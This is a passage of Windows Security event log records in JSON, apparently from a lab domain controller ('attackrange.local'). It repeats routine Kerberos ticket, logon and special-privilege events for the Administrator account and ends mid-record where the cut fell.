{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220580,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220581,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220582,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220583,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F49E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f49e","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220584,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F49E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7f49e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220585,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220586,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220587,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220588,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F75D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f75d","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220589,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F75D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7f75d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220590,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220591,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220592,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS 